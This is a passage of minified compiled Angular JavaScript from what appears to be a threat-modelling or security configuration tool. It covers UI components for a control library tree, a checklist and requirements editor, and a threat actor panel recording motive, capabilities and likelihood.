pe=null;pe=te==this.translate.instant("general.Group")?this.dataService.Config.CreateControlGroup(d):this.dataService.Config.CreateControl(d),this.createNodes(),setTimeout(()=>{this.selectedNode=this.FindNodeOfObject(pe),this.selectedNode.isRenaming=!0},100)},canRename:!0,onRename:te=>{d.Name=te},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(d).subscribe(te=>{te&&(this.dataService.Config.DeleteControlGroup(d),this.selectedNode==Y&&(this.selectedNode=null),this.createNodes())})},children:[],canMoveUpDown:!0,onMoveUp:()=>{let te=T.Data.controlGroupIDs;if(0!=te.findIndex(pe=>pe==d.ID)){let pe=te.findIndex(Re=>Re==d.ID);te.splice(pe,0,te.splice(pe-1,1)[0]),k.children.splice(pe,0,c.children.splice(pe-1,1)[0])}},onMoveDown:()=>{let te=T.Data.controlGroupIDs;if(te.findIndex(pe=>pe==d.ID)!=te.length-1){let pe=te.findIndex(Re=>Re==d.ID);te.splice(pe,0,te.splice(pe+1,1)[0]),k.children.splice(pe,0,c.children.splice(pe+1,1)[0])}},canMoveToGroup:!0,onMoveToGroups:()=>q.filter(te=>te!=Y&&te!=k),onMoveToGroup:te=>{let pe="controlGroupIDs";T.Data[pe].splice(T.Data[pe].indexOf(d.ID),1),te.data.Data[pe].push(d.ID),this.createNodes()}};return d.SubGroups.forEach(te=>{let pe=n(te,d,Y,q);Y.children.push(pe)}),d.Controls.forEach(te=>Y.children.push(i(te,d,Y,q))),q.push(Y),Y},c=n(this.dataService.Config.ControlLibrary,null,null,[]);c.icon="security",c.canSelect=!1,c.canDelete=!1,c.hasMenu=!0,this.Nodes.push(c),xa.TransferExpandedState(e,this.Nodes),this.nodeTreeChanged.emit(this.Nodes)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-controls"]],features:[ci],decls:1,vars:1,consts:[["style","margin-left: 10px; margin-right: 10px;",4,"ngIf"],[2,"margin-left","10px","margin-right","10px"],[4,"ngIf"],[3,"node","control",4,"ngIf"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],[3,"node","control"]],template:function(e,i){1&e&&ne(0,jft,9,3,"div",0),2&e&&V("ngIf",i.selectedNode)},dependencies:[Ri,an,Ta,Ea,nn,un,Go,Xa,T2,Xi]}),t})();const $ft=["reqNavTree"];function Kft(t,a){if(1&t&&(m(0,"div",23),s(1),u()),2&t){const e=B().$implicit;C(1),ke(e.Abbr)}}function Xft(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",20),he("click",function(){const r=be(e).$implicit;return Me(B(4).selectedLevel=r)}),s(1,"\n                    "),m(2,"mat-icon",21),s(3,"arrow_right"),u(),s(4,"\n                    "),ne(5,Kft,2,1,"div",22),s(6,"\n                    "),m(7,"div",23),s(8),u(),s(9,"\n                    "),m(10,"button",24),he("click",function(){const r=be(e).$implicit;return Me(B(4).DeleteLevel(r))}),oe(11,"translate"),m(12,"mat-icon"),s(13,"delete"),u()(),s(14,"\n                  "),u()}if(2&t){const e=a.$implicit,i=B(4);Ct("highlight-light",i.selectedLevel===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedLevel===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),C(5),V("ngIf",e.Abbr),C(3),ke(e.Name),C(2),at("matTooltip",re(11,8,"general.Delete"))}}function Yft(t,a){if(1&t){const e=Ye();m(0,"button",30),he("click",function(){return be(e),Me(B(5).selectedLevel.Name="")}),oe(1,"translate"),s(2,"\n                        "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n                      "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function Jft(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                  "),m(2,"div",25),s(3,"\n                    "),m(4,"mat-form-field",26),s(5,"\n                      "),m(6,"mat-label"),s(7),oe(8,"translate"),u(),s(9,"\n                      "),m(10,"input",27),he("ngModelChange",function(n){return be(e),Me(B(4).selectedLevel.Name=n)}),u(),s(11,"\n                      "),ne(12,Yft,6,3,"button",28),s(13,"\n                    "),u(),s(14,"\n                    "),it(15,"br"),s(16,"\n                    "),m(17,"mat-form-field",26),s(18,"\n                      "),m(19,"mat-label"),s(20),oe(21,"translate"),u(),s(22,"\n                      "),m(23,"input",27),he("ngModelChange",function(n){return be(e),Me(B(4).selectedLevel.Abbr=n)}),u(),s(24,"\n                    "),u(),s(25,"\n                    "),it(26,"br"),s(27,"\n                    "),m(28,"mat-form-field",3),s(29,"\n                      "),m(30,"mat-label"),s(31),oe(32,"translate"),u(),s(33,"\n                      "),m(34,"textarea",29),he("ngModelChange",function(n){return be(e),Me(B(4).selectedLevel.Description=n)}),u(),s(35,"\n                    "),u(),s(36,"\n                  "),u(),s(37,"\n                "),Mt()}if(2&t){const e=B(4);C(7),ke(re(8,13,"general.Name")),C(3),at("matTooltip",e.selectedLevel.Name),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedLevel.Name),C(2),V("ngIf",e.selectedLevel.Name),C(8),ke(re(21,15,"properties.Abbr")),C(3),at("matTooltip",e.selectedLevel.Abbr),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedLevel.Abbr),C(8),ke(re(32,17,"properties.Description")),C(3),at("matTooltip",e.selectedLevel.Description),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedLevel.Description)}}function Zft(t,a){if(1&t){const e=Ye();s(0,"\n            "),m(1,"div",13),s(2,"\n              "),m(3,"div",14),s(4,"\n                "),m(5,"mat-list",15),he("cdkDropListDropped",function(n){be(e);const r=B(3);return Me(r.drop(n,r.selectedChecklistType.Levels))}),s(6,"\n                  "),m(7,"div",16),s(8),oe(9,"translate"),m(10,"button",17),he("click",function(){return be(e),Me(B(3).AddLevel())}),oe(11,"translate"),m(12,"mat-icon"),s(13,"add"),u()()(),s(14,"\n                  "),ne(15,Xft,15,10,"mat-list-item",18),s(16,"\n                "),u(),s(17,"\n              "),u(),s(18,"\n              "),m(19,"div",19),s(20,"\n                "),ne(21,Jft,38,19,"ng-container",2),s(22,"\n              "),u(),s(23,"\n            "),u(),s(24,"\n          ")}if(2&t){const e=B(3);C(5),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),C(3),za("",e.selectedChecklistType.Name," ",re(9,9,"properties.Levels")," "),C(2),at("matTooltip",re(11,11,"general.Add")),C(5),V("ngForOf",e.selectedChecklistType.Levels),C(6),V("ngIf",e.selectedLevel&&e.selectedChecklistType.Levels.includes(e.selectedLevel))}}function ept(t,a){if(1&t&&(m(0,"td",34),s(1),u()),2&t){const e=a.$implicit;C(1),ke(e.Abbr)}}function tpt(t,a){if(1&t){const e=Ye();m(0,"td",34)(1,"mat-checkbox",35),he("ngModelChange",function(n){const c=be(e).index;return Me(B(4).selectedRequirementType.RequiredPerLevel[c]=n)})("change",function(n){const c=be(e).index;return Me(B(4).OnRequiredChanged(n,c))}),u()()}if(2&t){const e=a.index,i=B(4);C(1),V("ngModel",i.selectedRequirementType.RequiredPerLevel[e])}}function ipt(t,a){if(1&t&&(m(0,"mat-option",36),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(4);V("value",e),C(1),ct("\n                      ",re(2,2,i.GetReqFulfillRuleTypeName(e)),"\n                    ")}}function apt(t,a){if(1&t&&(m(0,"mat-option",36),s(1),u()),2&t){const e=a.$implicit;V("value",e.ID),C(1),ct("\n                        ",e.Name,"\n                      ")}}function npt(t,a){if(1&t&&(bt(0),s(1),oe(2,"translate"),Mt()),2&t){const e=B().$implicit;C(1),ke(re(2,1,e.DisplayName))}}function opt(t,a){if(1&t&&(bt(0),s(1),Mt()),2&t){const e=B().$implicit;C(1),ke(e.ID)}}function rpt(t,a){if(1&t&&(m(0,"mat-option",36),s(1,"\n                          "),ne(2,npt,3,3,"ng-container",2),s(3,"\n                          "),ne(4,opt,2,1,"ng-container",2),s(5,"\n                        "),u()),2&t){const e=a.$implicit;V("value",e.ID),C(2),V("ngIf",e.DisplayName),C(2),V("ngIf",!e.DisplayName)}}function spt(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                      "),m(2,"button",39),he("click",function(){be(e);const n=B(6);return Me(n.OnNextComparisonType(n.selectedRequirementType.ReqFulfillRule.SWRule.PropertyRest))}),s(3),u(),s(4,"\n                      "),m(5,"mat-checkbox",40),he("ngModelChange",function(n){return be(e),Me(B(6).selectedRequirementType.ReqFulfillRule.SWRule.PropertyRest.Value=n)}),u(),s(6,"\n                      "),it(7,"br"),s(8,"\n                      "),m(9,"mat-checkbox",41),he("ngModelChange",function(n){return be(e),Me(B(6).selectedRequirementType.ReqFulfillRule.NeedsReview=n)}),s(10),oe(11,"translate"),u(),s(12,"\n                    "),Mt()}if(2&t){const e=B(6);C(3),ct("\n                        ",e.selectedRequirementType.ReqFulfillRule.SWRule.PropertyRest.ComparisonType,"\n                      "),C(2),V("ngModel",e.selectedRequirementType.ReqFulfillRule.SWRule.PropertyRest.Value),C(4),V("ngModel",e.selectedRequirementType.ReqFulfillRule.NeedsReview),C(1),ke(re(11,4,"properties.NeedsReview"))}}function cpt(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                    "),it(2,"br"),s(3,"\n                    "),m(4,"mat-form-field",26),s(5,"\n                      "),m(6,"mat-label"),s(7),oe(8,"translate"),u(),s(9,"\n                      "),m(10,"mat-select",38),he("valueChange",function(n){return be(e),Me(B(5).selectedRequirementType.ReqFulfillRule.SWRule.PropertyRest.ID=n)}),s(11,"\n                        "),ne(12,rpt,6,3,"mat-option",33),s(13,"\n                      "),u(),s(14,"\n                    "),u(),s(15,"\n                    "),ne(16,spt,13,6,"ng-container",2),s(17,"\n                  "),Mt()}if(2&t){const e=B(5);C(7),ke(re(8,4,"general.PropertyName")),C(3),V("value",e.selectedRequirementType.ReqFulfillRule.SWRule.PropertyRest.ID),C(2),V("ngForOf",e.GetAvailableProperties()),C(4),V("ngIf",(null==e.selectedRequirementType.ReqFulfillRule.SWRule.PropertyRest||null==e.selectedRequirementType.ReqFulfillRule.SWRule.PropertyRest.ID?null:e.selectedRequirementType.ReqFulfillRule.SWRule.PropertyRest.ID.length)>0)}}function lpt(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                  "),m(2,"mat-form-field",37),s(3,"\n                    "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n                    "),m(8,"mat-select",38),he("valueChange",function(n){return be(e),Me(B(4).selectedRequirementType.ReqFulfillRule.SWRule.ComponentTypeID=n)}),s(9,"\n                      "),ne(10,apt,2,2,"mat-option",33),s(11,"\n                    "),u(),s(12,"\n                  "),u(),s(13,"\n                  "),ne(14,cpt,18,6,"ng-container",2),s(15,"\n                "),Mt()}if(2&t){const e=B(4);C(5),ke(re(6,4,"properties.ComponentType")),C(3),V("value",e.selectedRequirementType.ReqFulfillRule.SWRule.ComponentTypeID),C(2),V("ngForOf",e.GetMyComponentSWTypes()),C(4),V("ngIf",(null==e.selectedRequirementType.ReqFulfillRule.SWRule||null==e.selectedRequirementType.ReqFulfillRule.SWRule.ComponentTypeID?null:e.selectedRequirementType.ReqFulfillRule.SWRule.ComponentTypeID.length)>0)}}function dpt(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n              "),m(2,"div",25),s(3,"\n                "),m(4,"h2"),s(5),u(),s(6,"\n                "),m(7,"mat-form-field",3),s(8,"\n                  "),m(9,"mat-label"),s(10),oe(11,"translate"),u(),s(12,"\n                  "),m(13,"textarea",4),he("ngModelChange",function(n){return be(e),Me(B(3).selectedRequirementType.Description=n)}),u(),s(14,"\n                "),u(),s(15,"\n                "),m(16,"table"),s(17,"\n                  "),m(18,"tr"),s(19,"\n                    "),it(20,"td"),s(21,"\n                    "),ne(22,ept,2,1,"td",31),s(23,"\n                  "),u(),s(24,"\n                  "),m(25,"tr"),s(26,"\n                    "),m(27,"td"),s(28),oe(29,"translate"),u(),s(30,"\n                    "),ne(31,tpt,2,1,"td",31),s(32,"\n                  "),u(),s(33,"\n                "),u(),s(34,"\n                "),it(35,"br"),s(36,"\n                "),m(37,"mat-form-field",26),s(38,"\n                  "),m(39,"mat-label"),s(40),oe(41,"translate"),u(),s(42,"\n                  "),m(43,"mat-select",32),he("valueChange",function(n){return be(e),Me(B(3).selectedRequirementType.ReqFulfillRule.RuleType=n)})("selectionChange",function(n){return be(e),Me(B(3).OnReqRuleTypeChanged(n))}),s(44,"\n                    "),m(45,"mat-option"),s(46),oe(47,"translate"),u(),s(48,"\n                    "),ne(49,ipt,3,4,"mat-option",33),s(50,"\n                  "),u(),s(51,"\n                "),u(),s(52,"\n                "),ne(53,lpt,16,6,"ng-container",2),s(54,"\n              "),u(),s(55,"\n            "),Mt()}if(2&t){const e=B(3);C(5),ke(e.selectedRequirementNode.name()),C(5),ke(re(11,12,"properties.Description")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedRequirementType.Description),C(9),V("ngForOf",e.selectedChecklistType.Levels),C(6),ke(re(29,14,"general.Required")),C(3),V("ngForOf",e.selectedChecklistType.Levels),C(9),ke(re(41,16,"properties.ReqFulfillRuleType")),C(3),V("value",e.selectedRequirementType.ReqFulfillRule.RuleType),C(3),ke(re(47,18,"properties.selectNone")),C(3),V("ngForOf",e.GetReqFulfillRuleTypes()),C(4),V("ngIf",1==e.selectedRequirementType.ReqFulfillRule.RuleType)}}function mpt(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"mat-form-field",3),s(3,"\n      "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n      "),m(8,"textarea",4),he("ngModelChange",function(n){return be(e),Me(B(2).selectedChecklistType.Description=n)}),u(),s(9,"\n    "),u(),s(10,"\n    \n    "),m(11,"mat-tab-group",5),he("selectedIndexChange",function(n){return be(e),Me(B(2).SetSelectedTabIndex(n))}),s(12,"\n      "),m(13,"mat-tab",6),oe(14,"translate"),s(15,"\n          "),ne(16,Zft,25,13,"ng-template",7),s(17,"\n      "),u(),s(18,"\n      "),m(19,"mat-tab",6),oe(20,"translate"),s(21,"\n        "),m(22,"as-split",8),he("dragEnd",function(n){return be(e),Me(B(2).OnSplitSizeChange(n,0))}),s(23,"\n          "),m(24,"as-split-area",9),s(25,"\n            "),m(26,"app-nav-tree",10,11),he("selectedNodeChanged",function(n){return be(e),Me(B(2).selectedRequirementNode=n)}),u(),s(28,"\n          "),u(),s(29,"\n          "),m(30,"as-split-area",12),s(31,"\n            "),ne(32,dpt,56,20,"ng-container",2),s(33,"\n          "),u(),s(34,"\n        "),u(),s(35,"\n      "),u(),s(36,"\n    "),u(),s(37,"\n  "),Mt()}if(2&t){const e=B(2);C(5),ke(re(6,22,"properties.Description")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedChecklistType.Description),C(3),V("selectedIndex",e.GetSelectedTabIndex()),C(2),at("label",re(14,24,"general.Settings")),C(6),at("label",re(20,26,"general.Requirements")),C(3),V("gutterSize",3)("restrictMove",!0),C(2),Ct("splitter-light2",!e.theme.IsDarkMode)("splitter-dark2",e.theme.IsDarkMode),V("size",e.GetSplitSize(0,0,300))("order",1),C(2),V("activeNode",e.selectedRequirementNode),C(4),Ct("bg-color-light3",!e.theme.IsDarkMode)("bg-color-dark3",e.theme.IsDarkMode),V("size",e.GetSplitSize(0,1,"*"))("order",2),C(2),V("ngIf",e.selectedRequirementType)}}function upt(t,a){if(1&t&&(m(0,"div",1),s(1,"\n  "),m(2,"h2"),s(3),u(),s(4,"\n  "),ne(5,mpt,38,28,"ng-container",2),s(6,"\n"),u()),2&t){const e=B();C(3),ke(e.selectedNode.name()),C(2),V("ngIf",e.selectedChecklistType)}}let hpt=(()=>{class t extends xa{constructor(e,i,n,r,c){super(),this.theme=e,this.dataService=i,this.dialog=n,this.translate=r,this.locStorage=c,this.componentProperties={},i.ConfigChanged.subscribe(d=>this.createNodes())}get selectedNode(){return this._selectedNode}set selectedNode(e){this._selectedNode=e,this.selectedLevel=null,this.selectedRequirementNode=null,setTimeout(()=>{this.createRequirementNodes()},100)}get selectedChecklistType(){var e;return null===(e=this.selectedNode)||void 0===e?void 0:e.data}get selectedRequirementNode(){return this._selectedRequirementNode}set selectedRequirementNode(e){this._selectedRequirementNode=e,this.selectedRequirementType=null==e?void 0:e.data}ngOnInit(){setTimeout(()=>{this.createNodes()},100)}AddLevel(){this.selectedChecklistType.Levels.push({Name:Gi.FindUniqueName("Level",this.selectedChecklistType.Levels.map(e=>e.Name)),Abbr:"",Description:""})}DeleteLevel(e){const i=this.selectedChecklistType.Levels.findIndex(n=>n.Name==e.Name&&n.Abbr==e.Abbr);i>=0&&this.selectedChecklistType.Levels.splice(i,1)}OnRequiredChanged(e,i){if(e.checked)for(let n=i+1;n<this.selectedChecklistType.Levels.length;n++)this.selectedRequirementType.RequiredPerLevel[n]=!0}OnReqRuleTypeChanged(e){e.value==Xg.SWComponent&&(this.selectedRequirementType.ReqFulfillRule.SWRule={ComponentTypeID:"",PropertyRest:{ID:"",ComparisonType:cc.Equals,Value:!0}})}GetAvailableProperties(){let e=this.selectedRequirementType.ReqFulfillRule.SWRule.ComponentTypeID;if(null==this.componentProperties[e]){let i=this.dataService.Config.GetMyComponentType(e),n=[];n.push({DisplayName:"properties.IsActive",ID:"IsActive",Tooltip:"",HasGetter:!0,Type:Ii.CheckBox,Editable:!0}),n.push({DisplayName:"properties.IsThirdParty",ID:"IsThirdParty",Tooltip:"",HasGetter:!0,Type:Ii.CheckBox,Editable:!0}),n.push(...i.Properties),this.componentProperties[e]=n}return this.componentProperties[e]}OnNextComparisonType(e){let i=Object.values(cc),n=i.length;n=2,e.ComparisonType=i[(i.indexOf(e.ComparisonType)+1)%2]}drop(e,i){Qs(i,e.previousIndex,e.currentIndex)}GetMyComponentSWTypes(){return this.dataService.Config.GetMyComponentSWTypes()}GetReqFulfillRuleTypes(){return GG.GetTypes()}GetReqFulfillRuleTypeName(e){return GG.ToString(e)}GetSelectedTabIndex(){let e=this.locStorage.Get(si.PAGE_CONFIG_CHECKLISTS_TAB_INDEX);return null!=e?e:0}SetSelectedTabIndex(e){this.locStorage.Set(si.PAGE_CONFIG_CHECKLISTS_TAB_INDEX,e)}GetSplitSize(e,i,n){let r=this.locStorage.Get(si.PAGE_CONFIG_CHECKLISTS_SPLIT_SIZE_X+e.toString());return null!=r?Number(JSON.parse(r)[i]):n}OnSplitSizeChange(e,i){this.locStorage.Set(si.PAGE_CONFIG_CHECKLISTS_SPLIT_SIZE_X+i.toString(),JSON.stringify(e.sizes))}createNodes(){const e=this.Nodes;this.Nodes=[];let i=(r,c)=>{let d={name:()=>r.Name,canSelect:!0,data:r,canAdd:!1,canRename:!0,onRename:T=>{r.Name=T},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(r).subscribe(T=>{T&&(this.dataService.Config.DeleteChecklistType(r),this.selectedNode==d&&(this.selectedNode=null),this.createNodes())})},children:[],canMoveUpDown:!0,onMoveUp:()=>{let T=this.dataService.Config.GetChecklistTypes();if(0!=T.findIndex(k=>k.ID==r.ID)){let k=T.findIndex(q=>q.ID==r.ID);T.splice(k,0,T.splice(k-1,1)[0]),c.children.splice(k,0,c.children.splice(k-1,1)[0])}},onMoveDown:()=>{let T=this.dataService.Config.GetChecklistTypes();if(T.findIndex(k=>k.ID==r.ID)!=T.length-1){let k=T.findIndex(q=>q.ID==r.ID);T.splice(k,0,T.splice(k+1,1)[0]),c.children.splice(k,0,c.children.splice(k+1,1)[0])}}};return d},n={name:()=>this.translate.instant("general.Checklists"),canSelect:!1,icon:"fact_check",canAdd:!0,hasMenu:!0,onAdd:()=>{let r=this.dataService.Config.CreateChecklistType();this.createNodes(),this.selectedNode=this.FindNodeOfObject(r),this.selectedNode.isRenaming=!0},children:[]};this.dataService.Config.GetChecklistTypes().forEach(r=>{let c=i(r,n);n.children.push(c)}),this.Nodes.push(n),xa.TransferExpandedState(e,this.Nodes),this.nodeTreeChanged.emit(this.Nodes)}createRequirementNodes(){var e;const i=this.reqNodes;this.reqNodes=[];let n=(c,d)=>{let T={name:()=>c.Name,canSelect:!0,data:c,canAdd:!0,onAdd:()=>{let k=this.dataService.Config.CreateRequirementType();c.AddSubRequirementType(k),this.createRequirementNodes(),this.selectedRequirementNode=this.ReqFindNodeOfObject(k),this.selectedRequirementNode.isRenaming=!0},canRename:!0,onRename:k=>{c.Name=k},canDuplicate:!0,onDuplicate:()=>{let k=this.dataService.Config.CreateRequirementType();k.CopyFrom(c.Data),k.Name=k.Name+"-Copy",d.data instanceof Jg?d.data.AddRequirementType(k):d.data instanceof Yg&&d.data.AddSubRequirementType(k),this.createRequirementNodes(),this.selectedRequirementNode=this.ReqFindNodeOfObject(k),this.selectedRequirementNode.isRenaming=!0},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(c).subscribe(k=>{k&&(this.dataService.Config.DeleteRequirementType(c),this.selectedNode==T&&(this.selectedNode=null),this.createRequirementNodes())})},children:[],canMoveUpDown:!0,onMoveUp:()=>{let k=[];if(d.data instanceof Jg?k=d.data.Data.requirementTypeIDs:d.data instanceof Yg&&(k=d.data.Data.subReqTypeIDs),0!=k.findIndex(q=>q==c.ID)){let q=k.findIndex(Y=>Y==c.ID);k.splice(q,0,k.splice(q-1,1)[0]),d.children.splice(q,0,d.children.splice(q-1,1)[0])}},onMoveDown:()=>{let k=[];if(d.data instanceof Jg?k=d.data.Data.requirementTypeIDs:d.data instanceof Yg&&(k=d.data.Data.subReqTypeIDs),k.findIndex(q=>q==c.ID)!=k.length-1){let q=k.findIndex(Y=>Y==c.ID);k.splice(q,0,k.splice(q+1,1)[0]),r.children.splice(q,0,r.children.splice(q+1,1)[0])}}};return c.SubReqTypes.forEach(k=>T.children.push(n(k,T))),T},r={name:()=>this.translate.instant("general.Requirements"),canSelect:!1,icon:"check_circle_outline",data:this.selectedChecklistType,canAdd:!0,hasMenu:!0,onAdd:()=>{let c=this.dataService.Config.CreateRequirementType();this.selectedChecklistType.AddRequirementType(c),this.createRequirementNodes(),this.selectedRequirementNode=this.ReqFindNodeOfObject(c),this.selectedRequirementNode.isRenaming=!0},children:[]};this.selectedChecklistType&&(this.selectedChecklistType.RequirementTypes.forEach(c=>{let d=n(c,r);r.children.push(d)}),this.reqNodes.push(r),xa.TransferExpandedState(i,this.reqNodes),null===(e=this.reqNavTree)||void 0===e||e.SetNavTreeData(this.reqNodes))}ReqFindNodeOfObject(e){return this.reqFindNodeOfObjectRec(e,this.reqNodes)}reqFindNodeOfObjectRec(e,i){for(let n=0;n<i.length;n++){if(i[n].data==e)return i[n];if(i[n].children){let r=this.reqFindNodeOfObjectRec(e,i[n].children);if(r)return r}}}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn),Ee(Sn),Ee(_r))},t.\u0275cmp=Wt({type:t,selectors:[["app-checklists"]],viewQuery:function(e,i){if(1&e&&Mi($ft,5),2&e){let n;Vt(n=Bt())&&(i.reqNavTree=n.first)}},inputs:{selectedNode:"selectedNode",selectedRequirementNode:"selectedRequirementNode"},features:[ci],decls:1,vars:1,consts:[["style","margin-left: 10px; margin-right: 10px; height: 100%;",4,"ngIf"],[2,"margin-left","10px","margin-right","10px","height","100%"],[4,"ngIf"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],[2,"height","100%",3,"selectedIndex","selectedIndexChange"],[3,"label"],["matTabContent",""],["direction","horizontal","unit","pixel",3,"gutterSize","restrictMove","dragEnd"],[2,"overflow","auto",3,"size","order"],[3,"activeNode","selectedNodeChanged"],["reqNavTree",""],[3,"size","order"],[1,"row"],[1,"column1"],["cdkDropList","",1,"prop-list","reorder-list",3,"cdkDropListDropped"],["mat-subheader",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matTooltip","click"],["cdkDrag","","matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click",4,"ngFor","ngForOf"],[1,"column2"],["cdkDrag","","matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-list-icon",""],["mat-line","",4,"ngIf"],["mat-line",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],[2,"margin","10px 0 10px 10px"],["appearance","fill",1,"property-form-field"],["matInput","","type","text","matTooltipShowDelay","1000",3,"spellcheck","ngModel","matTooltip","ngModelChange"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5","type","text","matTooltipShowDelay","1000",3,"spellcheck","ngModel","matTooltip","ngModelChange"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],["style","text-align: center;",4,"ngFor","ngForOf"],[3,"value","valueChange","selectionChange"],[3,"value",4,"ngFor","ngForOf"],[2,"text-align","center"],["color","primary",3,"ngModel","ngModelChange","change"],[3,"value"],["appearance","fill",1,"property-form-field",2,"margin-left","10px"],[3,"value","valueChange"],["mat-raised-button","",2,"margin-left","10px","vertical-align","super",3,"click"],["color","primary",2,"margin-left","10px","vertical-align","super",3,"ngModel","ngModelChange"],["color","primary",3,"ngModel","ngModelChange"]],template:function(e,i){1&e&&ne(0,upt,7,2,"div",0),2&e&&V("ngIf",i.selectedNode)},dependencies:[Zi,Ri,an,Ta,Ea,Zh,Dp,Sd,kd,oa,br,da,nn,un,jr,Nr,yr,qh,Mu,Uh,Go,Xa,ts,is,Or,Lr,rc,Pa,df,Xi],styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%]   .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}']}),t})();function fpt(t,a){if(1&t&&(m(0,"mat-option",6),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetLMHName(e)))}}function ppt(t,a){if(1&t){const e=Ye();m(0,"div",1),s(1),oe(2,"translate"),it(3,"app-notes",2),s(4),oe(5,"translate"),it(6,"app-notes",2),s(7,"\n  "),m(8,"mat-form-field",3),s(9,"\n    "),m(10,"mat-label"),s(11),oe(12,"translate"),u(),s(13,"\n    "),m(14,"mat-select",4),he("valueChange",function(n){return be(e),Me(B().threatActor.Likelihood=n)}),s(15,"\n      "),ne(16,fpt,3,4,"mat-option",5),s(17,"\n    "),u(),s(18,"\n  "),u(),s(19,"\n"),u()}if(2&t){const e=B();C(1),ct("\n  ",re(2,11,"properties.Motive"),":\n  "),C(2),V("showTimestamp",!1)("hasCheckbox",!1)("strings",e.threatActor.Motive),C(1),ct("\n  ",re(5,13,"properties.Capabilities"),":\n  "),C(2),V("showTimestamp",!1)("hasCheckbox",!1)("strings",e.threatActor.Capabilities),C(5),ke(re(12,15,"general.Likelihood")),C(3),V("value",e.threatActor.Likelihood),C(2),V("ngForOf",e.GetLMHValues())}}let xZ=(()=>{class t{constructor(e,i){this.theme=e,this.dataService=i,this.isEdtingArray=[]}ngOnInit(){}GetLMHValues(){return An.GetKeys()}GetLMHName(e){return An.ToString(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi))},t.\u0275cmp=Wt({type:t,selectors:[["app-threat-actor"]],inputs:{threatActor:"threatActor"},decls:1,vars:1,consts:[["style","margin-left: 10px; margin-top: 10px;",4,"ngIf"],[2,"margin-left","10px","margin-top","10px"],[3,"showTimestamp","hasCheckbox","strings"],["appearance","fill",1,"property-form-field"],[3,"value","valueChange"],[3,"value",4,"ngFor","ngForOf"],[3,"value"]],template:function(e,i){1&e&&ne(0,ppt,20,17,"div",0),2&e&&V("ngIf",i.threatActor)},dependencies:[Zi,Ri,nn,un,Nr,yr,jp,Xi]}),t})();function 